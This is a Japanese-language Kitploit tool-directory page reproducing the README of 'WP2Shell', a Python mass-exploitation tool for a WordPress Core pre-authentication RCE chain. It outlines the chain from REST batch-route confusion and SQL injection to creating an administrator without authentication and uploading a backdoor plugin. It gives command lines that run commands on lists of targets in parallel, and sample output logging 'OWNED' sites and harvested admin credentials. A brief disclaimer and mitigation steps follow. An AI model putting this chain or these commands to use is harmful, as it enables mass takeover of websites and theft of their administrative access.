Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-63030 — WordPress Coreの認証前RCEチェーンCVE-2026-63030およびCVE-2026-60137(SQLインジェクションからリモートコード実行への連鎖)に対応するPython製のマスエクスプロイトおよび検出ツール。 | Kitploit
ツール/GitHubGitHub/fl0ydsec/cve-2026-63030
脆弱性スキャナーパスワード攻撃エクスプロイトウェブアプリケーション悪用ポストエクスプロイトウェブセキュリティペネトレーションテストレッドチーミングリモートアクセスツールペイロード開発
GitHubfl0ydsec/cve-2026-63030
72日前未レビュー

CVE-2026-63030

WordPress Coreの認証前RCEチェーンCVE-2026-63030およびCVE-2026-60137(SQLインジェクションからリモートコード実行への連鎖)に対応するPython製のマスエクスプロイトおよび検出ツール。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

WP2Shell — CVE-2026-63030 + CVE-2026-60137

WordPress Core 認証前 RCE(大量エクスプロイト / 検出ツール)

CVE-2026-63030 CVE-2026-60137 CVSS WordPress Auth

Author Python Telegram


📋 脆弱性の概要

属性詳細
CVE IDCVE-2026-63030 (+ CVE-2026-60137)
チェーンwp2shell — 認証前 RCE
深刻度🔴 CRITICAL (CVSS 9.8)
対象WordPress Core(プラグイン不要)
影響を受けるバージョン (RCE)6.9.0 – 6.9.4 および 7.0.0 – 7.0.1
影響を受けるバージョン (SQLi のみ)6.8.0 – 6.8.5
修正済み6.8.6 / 6.9.5 / 7.0.2 (2026/07/18)
必要な認証なし

🔍 技術的説明

WordPress コアにおける 2 つの連鎖した脆弱性:

  1. CVE-2026-60137 — SQL インジェクション: 内部クラス WP_Query の author__not_in パラメータにおける SQL インジェクション。
  2. CVE-2026-63030 — REST API バッチルート混同: エンドポイント /wp-json/batch/v1 がバッチエントリを同期させず、リクエストが次のルートに「流れ込む」。

このチェーンは SQLi を 認証前 RCE に変換する:

root@kitploit:~
route confusion /wp-json/batch/v1 ─► SQLi no author__not_in
        │                                    │
        └──────────────┬─────────────────────┘
                       ▼
        UNION fake-post + oEmbed + changeset poisoning
                       ▼
        POST /wp/v2/users  (roles: administrator)  ← admin criado sem auth
                       ▼
        login → upload plugin backdoor → RCE

フォールバック: 直接 INTO OUTFILE(FILE 権限)およびブラインドハッシュ抽出 + クラック。


🚀 使用方法

root@kitploit:~
python wp2shell.py exploit -l targets.txt --cmd whoami --authorized -k -c 10 --delay 2
python wp2shell.py remote  -l targets.txt --authorized --active-probe -c 20 -f csv -o scan.csv
オプション説明
-l, --targets-file1 行につき 1 ターゲット(繰り返し指定可能、上限なし)
-u, --target単一ターゲット
--cmdターゲット上で実行するコマンド
--authorized必須(または WP2SHELL_AUTHORIZED=1)
-c, --concurrency並列ターゲット数 (1–32)
--delayタイミング/抽出の SLEEP (2 = 堅牢)
--rateターゲットあたりのリクエスト/秒
-k, --insecureTLS を無視
--proxyHTTP プロキシ
--wordlist / --password / --username認証情報フォールバック
--log / --owned / --results-csv出力ファイル

📊 出力

root@kitploit:~
[+] [14:22:31] https://target.com  OWNED  ✓1 ~0 ✗10
[~] [14:22:32] https://other.com   ADMIN  ✓1 ~1 ✗10

---- SUMMARY ----
[+] owned=1   [~] admin=1   [-] fail=10   [.] error=0
  • owned.txt — RCE に成功したターゲット(シェル URL)
  • admins.txt — RCE シンクなしで作成された管理者(認証情報)
  • exploit_log.txt — ターゲットごとの詳細
  • results.csv — サマリー(exit_code: 0=owned, 4=admin, 2=fail, 3=error)

⚙️ 機能

  • UNION SQLi インバンド + タイミング + X-WP-Total オラクル
  • oEmbed/changeset poisoning による認証前管理者作成
  • 隠しログイン(SQLi 経由の WPS Hide Login whl_page)+ 一般的なスラッグ
  • 正しい nonce/有効化を伴うプラグインアップロード + INTO OUTFILE フォールバック
  • 上限なしの大量処理、ターゲットごとの並列処理、ハング防止デッドライン
  • owned/admins のリアルタイム表示

📁 ファイル構成

root@kitploit:~
├── wp2shell.py       # exploit + detector
├── targets.txt       # alvos (uma URL por linha)
├── owned.txt         # RCE conseguido (auto-criado)
├── admins.txt        # admins criados (auto-criado)
└── README.md

⚠️ 免責事項

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║  Only use on systems you own or have explicit permission.       ║
║  The author is NOT responsible for any misuse or damage.        ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ 緩和策

  1. 6.8.6 / 6.9.5 / 7.0.2(またはそれ以上)に更新する
  2. /wp-json/batch/v1 および /?rest_route=/batch/v1 への未認証 POST をブロックする
  3. wp-content/uploads/ および wp-content/plugins/ 内の不審な PHP を監査する

👤 作者

fl0ydsec (Floydroot)

GitHub Telegram

Security Research

ツールをダウンロード